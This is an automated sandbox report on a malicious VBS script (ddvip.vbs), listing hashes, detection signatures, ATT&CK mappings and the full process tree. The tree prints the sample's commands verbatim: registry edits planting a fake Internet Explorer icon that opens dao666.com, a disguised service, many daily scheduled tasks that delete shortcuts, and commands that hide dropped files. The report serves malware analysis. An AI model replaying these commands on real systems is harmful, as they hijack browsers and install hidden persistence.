Analysis
-
max time kernel
142s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
25/12/2023, 19:56
General
-
Target
ddvip.vbs
-
Size
1KB
-
MD5
827e1802b44b5bf584d9804f3ed45ebd
-
SHA1
f19dfeabbb015bc73520deb8554dc9c6bbb83564
-
SHA256
1bf04cd426f362434b98d46901b8c77b0aadd04b93d92f778e7bd10ff404afe6
-
SHA512
c5b91a4c576164bc572ec3e3724f5845da5754c257a81ac6eeabc7d336ac516b3e1e7c59e5197dbb4946219e8bfbd3f09d334f428885adecee88924ea0b3923e
Score
8/10
Malware Config
Signatures
-
Creates new service(s) 1 TTPs
-
Sets file to hidden 1 TTPs 6 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Registers COM server for autorun 1 TTPs 6 IoCs
-
Drops file in Program Files directory 21 IoCs
-
Drops file in Windows directory 4 IoCs
-
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 37 IoCs
-
Modifies registry class 44 IoCs
-
Runs net.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ddvip.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?ddvip2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?ddvip3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1272 CREDAT:17410 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\tool.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"3⤵
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f3⤵
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f3⤵
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder"3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "Attributes" /t REG_DWORD /d 0 /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideFolderVerbs" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "HideOnDesktopPerUser" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder" /v "WantsParsDisplayName" /t REG_SZ /d "" /f3⤵
- Modifies registry class
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\runonce.cmd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc create Schedule binpath= "C:\Windows\svchost.exe -k netsvcs" depend= rpcss start= auto displayname= "Task Scheduler"3⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc config Schedule start= auto3⤵
- Launches sc.exe
-
-
C:\Windows\system32\net.exenet start "Task Scheduler"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start "Task Scheduler"4⤵
-
-
-
C:\Windows\system32\at.exeat 8:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 8:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 8:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 9:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 9:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 9:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 10:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 11:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 11:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 11:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 12:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 12:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 12:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 13:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 13:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 13:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 14:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 16:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 16:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 18:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 18:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 19:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 18:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 17:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 17:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 17:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 16:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 15:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 15:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 15:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 19:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 20:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 20:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 20:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 21:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 22:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 22:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 22:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 23:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 23:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 23:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 00:31 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 00:32 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Explorer*.*"3⤵
-
-
C:\Windows\system32\at.exeat 00:30 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"3⤵
-
-
C:\Windows\system32\at.exeat 10:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 10:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 10:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 14:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 14:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 19:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 19:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:33 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\╫└├µ\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:34 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*Σ»└└*.*"3⤵
-
-
C:\Windows\system32\at.exeat 21:35 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday C:\WINDOWS\mail\UltraEdit\is.cmd3⤵
-
-
C:\Windows\system32\at.exeat 21:36 /every:Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday cmd.exe /c del "C:\Documents and Settings\All Users\╫└├µ\*Σ»└└*.*"3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\copy.cmd2⤵
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\Windows\360SE.vbs"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\tool.cmd"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\360.cmd"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +r +h +s "C:\Program Files\WinWare\361.cmd"3⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\360.cmd2⤵
- Drops file in Program Files directory
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C .\cpa.cmd2⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del .\runonce.cmd2⤵
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 30afcc931198594adcf2a56ed3e4e63e Vkfos/ACKE2Gm+2cgE91ZQ.0.1.0.0.01⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567240c407312315393794e9b65d1e8e5
SHA1810b252670834678fdaa057b39e07985a029be7a
SHA2560a29a7d11891968f5a4a6eb615e87a428d5e93c9a48908c7a1de7cf5a40acf22
SHA512897bfb0b8b9ca3a315ff72b9c937aba50ddb88dd28ce3d8f156ccb01d008e566260e317364966fc3fe59a6f78017ad3924f32dd6d4b4a170550edc55b62bd3f2
-
Filesize
567B
MD5feb810eaa38eb0890ad2034d322e4c79
SHA1a7c7ddd0bd405b949ddbffed364269d145ee78e4
SHA256e346f4ed81e3e7974c4a9978789fc08737abc4c7318f31d747b1ad23ce5bf800
SHA512f96b5e8129ab8fd4703a2e4bddf4245e9c4a64a8d69663f755386021cb8fd34a75bd0fa53b4579145bf50be2948d9ae5d0f4bdb556ae73b4cc85e6a2130f5ab9
-
Filesize
3KB
MD5d7eece295819ac643894e11ec290fc16
SHA1eaf976563ab1d54ddbb538846f21d80663c0482b
SHA25600057dbc21e30cd983f4428934333acc1243bef2a7ae3e89ccfed37aaea35aef
SHA51261602cd5b19a9f3d65c52ec8b393081949167496ec02420fe403e5ee63a3f59f29d367246af4a6ba3a6437ea46759315f6e1721fbd44f84878b548e61d261036
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
16KB
MD5675530f093a381b9d716103cc64e852d
SHA1d31b1f5dabbf5e3102ab3a2cf1ef7bf792062a3a
SHA2566039fe7e9dc7f7ee41a30e60b5678f4185594b5028d75071b8f3199dd83126a7
SHA512fdbf9b74b27fdf34166a0b896b7d0ddd8ff2dce02527e3524a72c80f2eb7fa329b8b640009ddb720d3dff4525897874392cbe630ab831d5df864832595ed8814
-
Filesize
16KB
MD543bc4172a78afa2cec66005873ba88cc
SHA1d9d39237ed9116cf267bce9d9cd5e9aff3d99240
